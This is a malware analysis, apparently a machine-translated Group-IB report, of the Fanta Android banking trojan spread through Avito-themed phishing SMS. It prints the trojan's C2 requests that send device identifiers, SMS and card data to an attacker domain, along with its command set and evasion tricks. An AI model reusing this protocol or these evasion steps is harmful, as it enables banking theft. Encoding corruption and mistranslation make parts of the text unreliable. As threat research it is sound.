
Një herë do të dëshironi të shisni diçka në Avito dhe, pasi të publikoni një përshkrim të detajuar të produktit tuaj (për shembull, moduli i memorjes RAM), do të merrni një mesazh të tillë:
Duke hapur linkun, do të shihni një faqe që duket mjaft e pafajshme, duke ju njoftuar, juve shitësin e lumtur dhe të suksesshëm, për kryerjen e një blerjeje:

Pasi të keni klikuar butonin 'Vazhdo', një skedar APK me ikonë dhe emër që ngjall besim do të shkarkohet në pajisjen tuaj Android. Keni instaluar një aplikacion që për arsye të panjohura kërkon leje për AccessibilityService, pastaj shfaqen dhe shuhen shpejt disa dritare dhe... gjithçka.
Ju hyni për të kontrolluar bilancin tuaj, por aplikacioni juaj bankar dukej se përsëri kërkonte të dhënat e kartës tuaj. Pas futjes së të dhënave, ndodhi e keqja: për një arsye që ende nuk e kuptoni, paratë fillojnë të zhduken nga llogaria juaj. Përpiqeni të zgjidhni problemin, por telefoni juaj bëhet në ngritje: vetë klikon butonat 'Në prapavijë' dhe 'Në shtëpi', nuk fiket dhe nuk lejon aktivizimin e asnjë mbrojtjeje. Në përfundim, mbeteni pa para, produkti juaj nuk është blerë, jeni në ngatërrim dhe pyesni veten: çfarë ndodhi?
Përgjigjja është e thjeshtë: ju jeni viktimë e trojanit Fanta në Android, nga familja Flexnet. Si ndodhi kjo? Tani do ta shpjegojmë.
Shkruar nga: Andrey Polovinkin, specialist i ri në analizën e malware-it, Ivan Pisarëv, specialist në analizën e malware-it.
Disa statistika
PĂ«r herĂ« tĂ« parĂ«, pĂ«r familjen e trojanĂ«ve Android Flexnet u bĂ« e njohur qĂ« nĂ« vitin 2015. GjatĂ« kĂ«saj periudhe tĂ« gjatĂ« aktiviteti, kjo familje Ă«shtĂ« zgjeruar nĂ« disa nĂ«nfamilje: Fanta, Limebot, Lipton etj. TrojanĂ«t, ashtu si infrastruktura e tyre lidhur, nuk janĂ« duke qĂ«ndruar nĂ« vend: po zhvillohen skema tĂ« reja efektive shpĂ«rndarjeje â nĂ« rastin tonĂ« faqe phishing cilĂ«sore, tĂ« targetuara pĂ«r pĂ«rdoruesin-shitĂ«s, dhe zhvilluesit e trojanĂ«ve po ndjekin trendet moderne nĂ« krijimin e viruseve â duke shtuar funksionalitete tĂ« reja qĂ« lejojnĂ« vjedhjen mĂ« tĂ« efektshme tĂ« parave nga pajisjet e infektuara dhe kalimin e mekanizmave tĂ« mbrojtjes.
Kampanja e përshkruar në këtë artikull është e orientuar drejt përdoruesve nga Rusia, me një numër të vogël të pajisjeve të infektuara të regjistruar në Ukrainë, madje edhe më pak në Kazakistan dhe Bjellorusi.
PavarĂ«sisht se Flexnet ka qenĂ« nĂ« arenĂ«n e trojanĂ«ve pĂ«r Android pĂ«r mĂ« shumĂ« se 4 vjet dhe Ă«shtĂ« studiuar nĂ« detaje nga shumĂ« kĂ«rkues, ai ende Ă«shtĂ« nĂ« formĂ« tĂ« shkĂ«lqyer. QĂ« nga janari i vitit 2019, shuma e potenciale e dĂ«mit arrin mbi 35 milion rubla â dhe kjo Ă«shtĂ« vetĂ«m pĂ«r fushatat nĂ« Rusi. NĂ« vitin 2015, versione tĂ« ndryshme tĂ« kĂ«tij trojani Android janĂ« shitur nĂ« forume underground, aty ishte e mundur tĂ« gjeje gjithashtu kodin burimor tĂ« trojanit me njĂ« pĂ«rshkrim tĂ« detajuar. Kjo do tĂ« thotĂ« se statistikat e dĂ«mit nĂ« mbarĂ« botĂ«n janĂ« edhe mĂ« mbresĂ«lĂ«nĂ«se. NjĂ« tregues i mirĂ« pĂ«r njĂ« tĂ« moshuar tĂ« tillĂ«, apo jo?

Nga shitja deri te tradhtia
Sipas screenshots tĂ« paraqitura mĂ« parĂ« tĂ« faqes sĂ« phishing pĂ«r shĂ«rbimin e internetit pĂ«r shpallje Avito, ajo Ă«shtĂ« pĂ«rgatitur pĂ«r njĂ« viktimĂ« tĂ« caktuar. Duket se kriminelĂ«t po pĂ«rdorin njĂ« nga parserat e Avito, qĂ« nxjerr numrin e telefonit dhe emrin e shitĂ«sit, si dhe pĂ«rshkrimin e produktit. Pas hapjes sĂ« faqes dhe pĂ«rgatitjes sĂ« skedarit APK, viktimĂ«s i dĂ«rgohet njĂ« mesazh SMS me emrin e saj dhe njĂ« lidhje drejt faqes sĂ« phishing, qĂ« pĂ«rmban pĂ«rshkrimin e produktit tĂ« saj dhe shumĂ«n e marrĂ« nga "shkĂ«mbimi" i produktit. Duke klikuar nĂ« butonin, pĂ«rdoruesi merr njĂ« skedar APK tĂ« dĂ«mshĂ«m â Fanta.
Kërkimi i domainit shcet491[.]ru tregoi se ai është deleguar në serverët DNS të kompanisë Hostinger:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
Skedari i zonës së domainit përmban shënime që tregojnë për adresat IP 31.220.23[.]236, 31.220.23[.]243 dhe 31.220.23[.]235. Megjithatë, shënimi kryesor i burimit të domainit (A-record) tregon për serverin me IP adresën 178.132.1[.]240.
IP adresa 178.132.1[.]240 është e vendosur në Holandë dhe i takon hostit WorldStream. Adresat IP 31.220.23[.]235, 31.220.23[.]236 dhe 31.220.23[.]243 janë të vendosura në Mbretërinë e Bashkuar dhe i takojnë serverit virtual të hostimit HOSTINGER. Si regjistrues përdoret openprov-ru. Në IP adresin 178.132.1[.]240 janë rezoluar gjithashtu domenet:
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
Duhet të theksohet se nga të gjitha domenet ishin të arritshme lidhje të formatit të mëposhtëm:
http://(www.){0,1}/[0-9]{7}
Ky model përfshin gjithashtu lidhje nga mesazhet SMS. Sipas të dhënave historike, është zbuluar se një domeni i përket disa lidhjeve sipas modelit të përshkruar më sipër, që tregon për përdorimin e një domeni për shpërndarjen e trojanëve ndaj disa viktimave.
TĂ« kalojmĂ« pak pĂ«rpara: si server menaxhues, trojani i ngarkuar nga lidhja SMS pĂ«rdor adresĂ«n onuseseddohap[.]club. Ky domen u regjistrua mĂ« 2019-03-12, dhe qĂ« nga 2019-04-29 ka pasur ndĂ«rveprime tĂ« aplikacioneve APK me kĂ«tĂ« domen. NĂ« pĂ«rputhje me tĂ« dhĂ«nat e marra nga VirusTotal, gjithsej 109 aplikacione kanĂ« ndĂ«rvepruar me kĂ«tĂ« server. Domeni vetĂ« u rezolua nĂ« IP adresin 217.23.14[.]27, i lokalizuar nĂ« HolandĂ« dhe i pĂ«rket hostuesit WorldStream. Si regjistrues pĂ«rdoret namecheap. NĂ« kĂ«tĂ« IP adresĂ« janĂ« rezoluar gjithashtu domenet bad-racoon[.]club ($start Ći mĂ« 2018-09-25) dhe bad-racoon[.]live (du 25-10-2018). Me domenin bad-racoon[.]club Ă«shtĂ« ndĂ«rvepruar me mĂ« shumĂ« se 80 skedarĂ« APK, me bad-racoon[.]live â mĂ« shumĂ« se 100.
Në përgjithësi, mënyra e sulmit duket kështu:

ĂfarĂ« ka Fanta nĂ«n kapak?
Si shumë trojanë të tjerë për Android, Fanta është në gjendje të lexojë dhe dërgojë mesazhe SMS, të kryejë kërkesa USSD, të tregojë ekranet e veta mbi aplikacione (përfshirë ato bankare). Megjithatë, në arsenalin e funksionaliteteve të këtij familjeje është shtuar: Fanta ka filluar të përdorë AccessibilityService për qëllime të ndryshme: leximin e përmbajtjes së njoftimeve të aplikacioneve të tjera, parandalimin e zbarkimit dhe ndalimin e ekzekutimit të trojanit në pajisjen e infektuar, etj. Fanta punon në të gjitha versionet e Android nga 4.4 e lart. Në këtë artikull, ne do të shqyrtojmë më në detaje mostrën e ardhshme të Fanta:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Menjëherë pas fillimit
Menjëherë pas fillimit, trojani fshihet ikona e tij. Përdorimi i aplikacionit është i mundur vetëm nëse emri i pajisjes së infektuar nuk ndodhet në listën:
- android_x86
- VirtualBox
- Nexus 5X(bullhead)
- Nexus 5(razor)
Kjo kontroll bĂ«het nĂ« shĂ«rbimin kryesor tĂ« trojanit â MainService. NĂ« fillim, ndodhi inicializimi i parametrave tĂ« konfigurimit tĂ« aplikacionit me vlerat default (pĂ«r formatin e ruajtjes sĂ« tĂ« dhĂ«nave tĂ« konfigurimit dhe kuptimin e tyre do tĂ« flitet mĂ« vonĂ«), si dhe regjistrimi i njĂ« pajisjeje tĂ« re tĂ« infektuar nĂ« serverin menaxhues. NĂ« server do tĂ« dĂ«rgohet njĂ« kĂ«rkesĂ« HTTP POST me tipin e mesazhit register_bot dhe informacionin mbi pajisjen e infektuar (versioni Android, IMEI, numri i telefonit, emri i operatorit dhe kodi i vendit ku Ă«shtĂ« regjistruar operatori). Si server menaxhues shĂ«rben adresa hXXp://onuseseddohap[.]club/controller.php. NĂ« pĂ«rgjigje, serveri dĂ«rgon njĂ« mesazh qĂ« pĂ«rmban fushat bot_id, bot_pwd, server â kĂ«to vlera aplikacioni i ruan si parametra tĂ« serverit CnC. Parametri server Ă«shtĂ« opsional, nĂ«se fusha nuk u mor: Fanta pĂ«rdor adresĂ«n e regjistrimit â hXXp://onuseseddohap[.]club/controller.php. Funkcioni i ndryshimit tĂ« adresĂ«s CnC mund tĂ« aplikohet pĂ«r tĂ« zgjidhur dy probleme: shpĂ«rndarja e barabartĂ« e ngarkesĂ«s midis disa serverĂ«ve (nĂ« rast tĂ« numrit tĂ« madh tĂ« pajisjeve tĂ« infektuara, ngarkesa nĂ« njĂ« server web tĂ« paoptimizuar mund tĂ« jetĂ« e lartĂ«), si dhe pĂ«r tĂ« pĂ«rdorur njĂ« server alternativ nĂ« rast tĂ« dĂ«shtimit tĂ« njĂ«rit nga serverĂ«t CnC.
Nëse ndodhi një gabim gjatë dërgimit të kërkesës, trojani do të përsërisë procesin e regjistrimit pas 20 sekondash.
Pas regjistrimit të suksesshëm të pajisjes, Fanta do të tregojë përdoruesit mesazhin në vijim:

ShĂ«nim i rĂ«ndĂ«sishĂ«m: shĂ«rbimi me emrin Siguria e sistemit â emri i shĂ«rbimit tĂ« trojanit, dhe pas klikimit nĂ« butonin OK do tĂ« hapet njĂ« dritare me cilĂ«simet e Accessibility tĂ« pajisjes sĂ« infektuar, ku pĂ«rdoruesi duhet tĂ« japĂ« vetĂ« tĂ« drejtat e Accessibility pĂ«r shĂ«rbimin e dĂ«mshĂ«m:

Sapo përdoruesi aktivizon AccessibilityService, Fanta merr akses në përmbajtjen e dritareve të aplikacioneve dhe veprimet që kryhen në to:

Menjëherë pas marrjes së të drejtave të Accessibility, trojani kërkon të drejtat e administratorit dhe të drejtat për leximin e njoftimeve:

Me ndihmën e AccessibilityService, aplikacioni imiton shtypjet e çelësave, duke fituar kështu të gjitha të drejtat e nevojshme.
Fanta krijon disa ekzemplarë të bazave të të dhënave (të cilat do të përshkruhen më vonë), të nevojshme për ruajtjen e të dhënave të konfigurimit, si dhe informacionit të mbledhur në procesin e infektimit të pajisjes. Për të dërguar informacionin e mbledhur, trojani krijon një detyrë të përsëritur, e cila është e dizajnuar për të shkarkuar fushat nga baza e të dhënave dhe për të marrë komandat nga serveri menaxhues. Intervali për të kontaktuar CnC përcaktohet në varësi të versionit të Android: në rastin e 5.1, intervali do të jetë 10 sekonda, në të kundërt 60 sekonda.
Për të marrë një komandë, Fanta bën një kërkesë GetTask në serverin menaxhues. Në përgjigje, CnC mund të dërgojë një nga komandat e mëposhtme:
| Ekipa | Përshkrimi |
|---|---|
| 0 | Dërgo SMS |
| 1 | Kryej telefonatë ose komandë USSD |
| 2 | Përditëso parametrin interval |
| 3 | Përditëso parametrin intercept |
| 6 | Përditëso parametrin smsManager |
| 9 | Filloni mbledhjen e SMS-ve |
| 11 | Rivendosni telefonin në cilësimet fabrika |
| 12 | Aktivizimi/Ăaktivizimi i regjistrimit tĂ« krijimit tĂ« dritareve |
Fanta gjithashtu mbledh njoftime nga 70 aplikacione bankar, sisteme pagesash të shpejta dhe portofol elektronike dhe i ruan ato në një bazë të dhënash.
Ruajtja e parametrave të konfigurimit
PĂ«r ruajtjen e parametrave tĂ« konfigurimit, Fanta pĂ«rdor njĂ« qasje standarde pĂ«r platformĂ«n Android â Preferences-fajllat. CilĂ«simet do tĂ« ruhen nĂ« njĂ« fajll me emrin settings. PĂ«rshkrimi i parametrave tĂ« ruajtur ndodhet nĂ« tabelĂ«n mĂ« poshtĂ«.
| Emri | Vlera e paracaktuar | Vlerat e mundshme | Përshkrimi |
|---|---|---|---|
| id | 0 | Integer | Identifikuesi i botit |
| server | hXXp://onuseseddohap[.]club/ | URL | Adresa e serverit të menaxhimit |
| pwd | â | String | FjalĂ«kalimi pĂ«r serverin |
| interval | 20 | Integer | Intervali kohor. Tregon sa duhet të vonohet ekzekutimi i detyrave të mëtejshme:
|
| intercept | all | all/telNumber | NĂ«se fusha barazohet me stringun all ose telNumber, atĂ«herĂ« SMS-i i marrĂ« do tĂ« kapet nga aplikacioni dhe nuk do tâi shfaqet pĂ«rdoruesit |
| smsManager | 0 | 0/1 | Aktivizimi/çaktivizimi i aplikacionit si marrës i SMS-ve të paracaktuar |
| readDialog | false | True/false | Aktivizimi/çaktivizimi i regjistrimit të ngjarjeve AccessibilityEvent |
Gjithashtu, Fanta përdor fajllin smsManager:
| Emri | Vlera e paracaktuar | Vlerat e mundshme | Përshkrimi |
|---|---|---|---|
| pckg | â | String | Emri i menaxherit tĂ« SMS-ve tĂ« pĂ«rdorur |
Ndërveprimi me bazat e të dhënave
Gjatë punës së tij, trojani përdor dy baza të dhënash. Baza e të dhënave me emrin a përdoret për ruajtjen e informacionit të ndryshëm të mbledhur nga telefoni. Baza e dytë e të dhënave quhet fanta.db dhe përdoret për ruajtjen e konfigurimeve që kanë të bëjnë me krijimin e dritareve të phishing-ut, të destinuara për të mbledhur informacion mbi kartat bankare.
Trojan përdor bazën e të dhënave a për ruajtjen e informacionit të mbledhur dhe për regjistrimin e veprimeve të tij. Të dhënat ruhen në tabelën logs. Për krijimin e tabelës përdoret kërkesa SQL e mëposhtme:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)Në bazën e të dhënave ndodhet informacioni i mëposhtëm:
1. Regjistrimi i aktivizimit të pajisjes së infektuar me mesazhin Telefoni u ndez!
2. Njoftimet nga aplikacionet. Mesazhi formohet sipas këtij shablli:
():
3. Të dhënat e kartave bankare nga format e phishing-ut të krijuara nga trojani. Parametri VIEW_NAME mund të jetë një nga listat:
- AliExpress
- Avito
- Google Play
- Tjetër
Mesazhi regjistrohet në formatin:
[]() Numri i kartës:; Data:/%; CVV:
4. Mesazhet SMS hyrëse/dalëse në format:
([] Lloji: Hyrëse/Dalëse) :
5. Informacion mbi paketën që krijon dritaren në format:
()
Shembulli i tabelës logs:

Një nga funksionalitetet e Fanta është grumbullimi i informacionit mbi kartat bankare. Grumbullimi i të dhënave ndodh përmes krijimit të dritareve të pescaçta kur hapen aplikacionet bankare. Trojani krijon një dritare peskaçte vetëm një herë. Informacioni se dritarja është shfaqur për përdoruesin ruhet në tabelë settings në bazën e të dhënave fanta.db. Për krijimin e bazës së të dhënave përdoret kërkesa SQL si vijon:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);Të gjitha fushat e tabelës settings në mënyrë default inicializohen me vlerën 1 (krijoni dritaren e pescaçte). Pasi përdoruesi të ketë futur të dhënat e tij, vlera do të vendoset në 0. Shembulli i fushave të tabelës settings:
- can_login â fusha pĂ«rgjigjet pĂ«r shfaqjen e formularit kur hapet aplikacioni bankar
- first_bank â nuk nuk pĂ«rdoret
- can_avito â fusha tregon formĂ«n gjatĂ« hapjes sĂ« aplikacionit Avito
- can_ali â fusha tregon formĂ«n gjatĂ« hapjes sĂ« aplikacionit Aliexpress
- can_another â fusha tregon formĂ«n gjatĂ« hapjes sĂ« çdo aplikacioni nga lista: Yula, Pandao, Drom Auto, Portofoli. Kartat e zbritjes dhe bonuseve, Aviasales, Booking, Trivago
- can_card â fusha tregon formĂ«n gjatĂ« hapjes Google Play
Bashkëpunimi me serverin menaxhues
Bashkëpunimi në rrjet me serverin menaxhues ndodh përmes protokollit HTTP. Për të punuar me rrjetin, Fanta përdor bibliotekën e njohur Retrofit. Kërkesat dërgohen në adresën hXXp://onuseseddohap[.]club/controller.php. Adresa e serverit mund të ndryshohet gjatë regjistrimit në server. Nga serveri mund të vijnë cookie. Fanta bën këto kërkesa në server:
- Regjistrimi i robotit në serverin menaxhues ndodh një herë gjatë nisjes së parë. Në server dërgohen të dhënat e mëposhtme për pajisjen e infektuar:
· Cookie â cookie tĂ« marra nga serveri (vlera e parazgjedhur â varg i zbrazĂ«t)
· mode â konstantĂ« string register_bot
· prefix â konstantĂ« numerike 2
· version_sdk â formohet sipas kĂ«tij modeli: /(Avit)
· imei â IMEI i pajisjes sĂ« infektuar
· country â kodi i vendit, ku Ă«shtĂ« regjistruar operatori, nĂ« formatin ISO
· numri â numri i telefonit
· operatori â emri i operatoritShembulli i kĂ«rkesĂ«s qĂ« dĂ«rgohet nĂ« server:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>Në përgjigje të kërkesës, serveri duhet të kthejë një objekt JSON që përmban parametrat e mëposhtëm:
· bot_id â identifikuesi i pajisjes sĂ« infektuar. NĂ«se bot_id Ă«shtĂ« 0, Fanta do tĂ« ekzekutojĂ« pĂ«rsĂ«ri kĂ«rkesĂ«n.
· bot_pwd â password pĂ«r serverin.
· server â adresa e serverit menaxhues. ParametĂ«r i opsional. NĂ« rast se parametri nuk tregohet, do tĂ« pĂ«rdoret adresa e ruajtur nĂ« aplikacion.Shembulli i objektit JSON:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Kërkesa për të marrë komandën nga serveri. Në server dërgohen të dhënat e mëposhtme:
· Cookie â cookie tĂ« marra nga serveri
· bid â id e pajisjes sĂ« infektuar, e cila Ă«shtĂ« marrĂ« gjatĂ« dĂ«rgimit tĂ« kĂ«rkesĂ«s register_bot
· pwd â password pĂ«r serverin
· divice_admin â fusha pĂ«rcakton nĂ«se janĂ« marrĂ« tĂ« drejtat administratore. NĂ«se janĂ« marrĂ« tĂ« drejtat administratore, fusha Ă«shtĂ« e barabartĂ« me 1, pĂ«rndryshe 0
· AksesueshmĂ«ria â statusi i funksionimit tĂ« ShĂ«rbimit tĂ« AksesueshmĂ«risĂ«. NĂ«se shĂ«rbimi Ă«shtĂ« nisur, vlera Ă«shtĂ« e barabartĂ« me 1, pĂ«rndryshe 0
· Menaxheri i SMS â tregon nĂ«se trojani Ă«shtĂ« aktiv si aplikacioni i paracaktuar pĂ«r marrjen e SMS-ve
· ekrani â tregon nĂ« cilin gjendje ndodhet ekrani. Vlera do tĂ« caktohet 1, nĂ«se ekrani Ă«shtĂ« i ndezur, pĂ«rndryshe 0;Shembulli i kĂ«rkesĂ«s qĂ« dĂ«rgohet nĂ« server:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<V_ADM%>&Accessibility=<CSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>Në varësi të komandës, serveri mund të kthejë një objekt JSON me parametra të ndryshëm:
· Ekipa Dërgo SMS: Në parametra përfshihet numri i telefonit, teksti i SMS-së dhe identifikuesi i mesazhit të dërguar. Identifikuesi përdoret kur dërgohet një mesazh në server me tipin setSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }· Ekipa Kryej telefonatë ose komandë USSD: Numri i telefonit ose komanda vjen në trupin e përgjigjes.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }· Ekipa Ndrysho parametrin interval.
{ "response": [ { "mode": 2, "interval": } ], "status":"ok" }· Ekipa Ndrysho parametrin intercept.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/ } ], "status":"ok" }· Ekipa Ndrysho fushën SmsManager.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }· Ekipa Kryej mbledhjen e mesazheve SMS nga pajisja e infektuar.
{ "response": [ { "mode": 9 } ], "status":"ok" }· Ekipa Rivendosni telefonin në cilësimet fabrika:
{ "response": [ { "mode": 11 } ], "status":"ok" }· Ekipa Ndrysho parametrin ReadDialog.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Dërgimi i mesazhit me tipin setSmsStatus. Kjo kërkesë bëhet pas ekzekutimit të komandës Dërgo SMS. Kërkesa duket si më poshtë:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus& id=& status_sms=- Dërgimi i përmbajtjes së bazës së të dhënave. Në një kërkesë dërgohet një rresht. Të dhënat e mëposhtme dërgohen në server:
· Cookie â cookie tĂ« marra nga serveri
· mode â konstantĂ« string setSaveInboxSms
· bid â id e pajisjes sĂ« infektuar, e cila Ă«shtĂ« marrĂ« gjatĂ« dĂ«rgimit tĂ« kĂ«rkesĂ«s register_bot
· text â pĂ«rmbajtja nĂ« regjistrin aktual tĂ« DB (fusha d nga tabela logs nĂ« bazĂ«n e tĂ« dhĂ«nave a)
· numri â emri i regjistrit aktual tĂ« DB (fusha p nga tabela logs nĂ« bazĂ«n e tĂ« dhĂ«nave a)
· sms_mode â vlera numerike (fusha m nga tabela logs nĂ« bazĂ«n e tĂ« dhĂ«nave a)KĂ«rkesa duket si mĂ« poshtĂ«:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>Pas një dërgimi të suksesshëm në server, rreshti do të hiqet nga tabela. Shembuj i objektit JSON që kthehet nga serveri:
{ "response":[], "status":"ok" }
Ndërveprimi me AccessibilityService
AccessibilityService është implementuar për të lehtësuar përdorimin e pajisjeve Android nga njerëzit me aftësi të kufizuara. Në shumicën e rasteve, ndërveprimi me aplikacionin kërkon ndërveprim fizik. AccessibilityService lejon që ato të realizohen në mënyrë programore. Fanta përdor këtë shërbim për të krijuar dritare të rreme në aplikacionet bankare dhe për të penguar hapjen e cilësimeve të sistemit dhe disa aplikacioneve.
Duke pĂ«rdorur funksionalitetet e AccessibilityService, trojani ndjek ndryshimet e elementeve nĂ« ekranin e pajisjes sĂ« infektuar. Siç Ă«shtĂ« pĂ«rmendur mĂ« parĂ«, nĂ« cilĂ«simet e Fanta ka njĂ« parametrin qĂ« merret me regjistrimin e operacioneve me dritaret â readDialog. NĂ«se ky parametr Ă«shtĂ« i vendosur, do tĂ« shtohet informacion nĂ« bazĂ«n e tĂ« dhĂ«nave mbi emrin dhe pĂ«rshkrimin e paketĂ«s qĂ« iniciativ eventin. TrojanĂ«t kryejnĂ« veprimet nĂ« vijim kur ndodhin ngjarje:
- Imiton shtypjen e butonave prapa dhe në shtëpi në rastin e:
· nëse përdoruesi dëshiron të rinisë pajisjen e tij
· nĂ«se pĂ«rdoruesi dĂ«shiron tĂ« fshijĂ« aplikacionin âAvitoâ ose tĂ« ndryshojĂ« tĂ« drejtat e aksesit
· nĂ«se nĂ« faqen ka pĂ«rmendje tĂ« aplikacionit âAvitoâ
· kur hapet aplikacioni âGoogle Play Mbrojtjaâ
· kur hapen faqet me cilësimet e AccessibilityService
· kur ndodh njĂ« dritare dialogu âSiguria e sistemitâ
· kur hapet faqja me cilĂ«simet âDraw over other appâ
· kur hapen faqet âAplikacionetâ, âRestauration dhe rikuperimâ, âRikthim tĂ« dhĂ«nashâ, âRivendosja e cilĂ«simeveâ, âPaneli i zhvilluesveâ, âShĂ«rbimet specialeâ, âVeçori tĂ« veçantaâ, âTĂ« drejtat specialeâ
· nëse ngjarja është gjeneruar nga aplikacione të caktuara.Lista e aplikacioneve
- android
- Master Lite
- Clean Master
- Clean Master për CPU x86
- Menaxhimi i lejeve të aplikacionit Meizu
- MIUI Siguria
- Clean Master â Antivirus & Pastrimi i caches dhe plehrave
- Kontrolli prindëror dhe GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Siguria në rrjet Beta
- Pastrimi i Virusit, Antivirus, Pastrues (MAX Siguria)
- Mobile AntiVirus Siguria PRO
- Avast antivirus & gratis mbrojtja 2019
- Mobile Security ĐĐ”ĐłĐ°Đ€ĐŸĐœ
- AVG Mbrojtja për Xperia
- Siguria Mobile
- Malwarebytes antivirus & mbrojtja
- Antivirus për Android 2019
- Security Master â Antivirus, VPN, AppLock, Booster
- AVG antivirus për tabletin Huawei Menaxheri i Sistem
- Samsung Accessibility
- Samsung Smart Manager
- Security Master
- Speed Booster
- Dr.Web
- Dr.Web Security Space
- Dr.Web Mobile Control Center
- Dr.Web Security Space Life
- Dr.Web Mobile Control Center
- Antivirus & Siguria Mobile
- Kaspersky Internet Security: Antivirus dhe Mbrojtja
- Kaspersky Battery Life: Ruaj & Booster
- Kaspersky Endpoint Security â mbrojtja dhe menaxhimi
- AVG Antivirus falas 2019 â Mbrojtja pĂ«r Android
- Antivirus Android
- Norton Mobile Security dhe Antivirus
- Antivirus, firewall, VPN, siguria mobile
- Mobile Security: antivirus, VPN, mbrojtje nga vjedhja
- Antivirus për Android
- Nëse kërkohet leja gjatë dërgimit të mesazhit SMS në një numër të shkurtër, Fanta imiton prekjen e checkbox Kujto zgjedhjen dhe butonin dërgo.
- Kur përpiqet të marr përsipër të drejtat e administratorit nga trojani, bllokon ekranin e telefonit.
- Parandalon shtimin e administratorëve të rinj.
- Nëse aplikacioni antivirus dr.web ka zbuluar kërcënim, Fanta imiton prekjen e butonit injoro.
- Trojan imiton butonat e kthej në prapaskenë dhe në shtëpi, nëse ngjarja u krijua nga aplikacioni Samsung Device Care.
- Fanta krijon dritare phishing me forma për të futur informacionin mbi kartat bankare, nëse është nisur një aplikacion nga lista që përfshin rreth 30 shërbime të ndryshme në internet. Ndër to: AliExpress, Booking, Avito, Komponenti Google Play Market, Pandao, Drom Auto etj.
Format phishing
Fanta analizon cilat aplikacione hapen në pajisjen e infektuar. Nëse hapet një aplikacion i interesit, trojani tregon një dritare phishing mbi të gjitha të tjera, e cila përbën një formë për të futur informacionin e kartës bankare. Përdoruesi duhet të fusë të dhënat e mëposhtme:
- Numri i kartës
- Data e skadencës së kartës
- CVV
- Emri i mbajtësit të kartës (nuk është për të gjitha bankat)
Në varësi të aplikacionit të nisur, do të demonstrohen dritare të ndryshme phishing. Më poshtë do të paraqiten disa shembuj prej tyre:
Aliexpress:

Avito:
Për disa aplikacione të tjera, si p.sh. Google Play Market, Aviasales, Pandao, Booking, Trivago:

Si ishte gjithçka në të vërtetë
Fatke, personi qĂ« mori mesazhin SMS tĂ« pĂ«rshkruar nĂ« fillim tĂ« artikullit doli tĂ« ishte njĂ« specialist nĂ« fushĂ«n e kibernetikĂ«s. Prandaj, versioni real, jo kinematografik, ndryshon nga ai i mĂ«parshmi: njeriu mori njĂ« SMS interessante, dhe mĂ« pas ia dorĂ«zoi ekipit tĂ« InteligjencĂ«s pĂ«r GjuetinĂ« e KĂ«rcĂ«nimeve tĂ« Group-IB. Rezultati i sulmit â ky artikull. NjĂ« fund i lumtur, apo jo? MegjithatĂ«, jo tĂ« gjitha historitĂ« pĂ«rfundojnĂ« kaq mirĂ«, dhe pĂ«r ta bĂ«rĂ« qĂ« e juaja tĂ« mos ngjajĂ« me versionin kinematografik me humbje parash, nĂ« shumicĂ«n e rasteve, mjafton tĂ« ndiqni kĂ«to rregulla tĂ« njohura prej kohĂ«sh:
- mos instaloni aplikacione për pajisje mobile me sistemin operativ Android nga burime të tjera përveç Google Play
- kur instaloni një aplikacion, kushtoni vëmendje të veçantë të drejtave që kërkon aplikacioni
- kushtoni vëmendje zgjerimeve të skedarëve që shkarkoni
- instaloni rregullisht përditësimet e sistemit operativ Android
- mos vizitoni themelues të dyshimtë dhe mos shkarkoni skedarë prej tyre
- mos klikoni në lidhjet që merrni në mesazhet SMS.
Burimi: habr.com



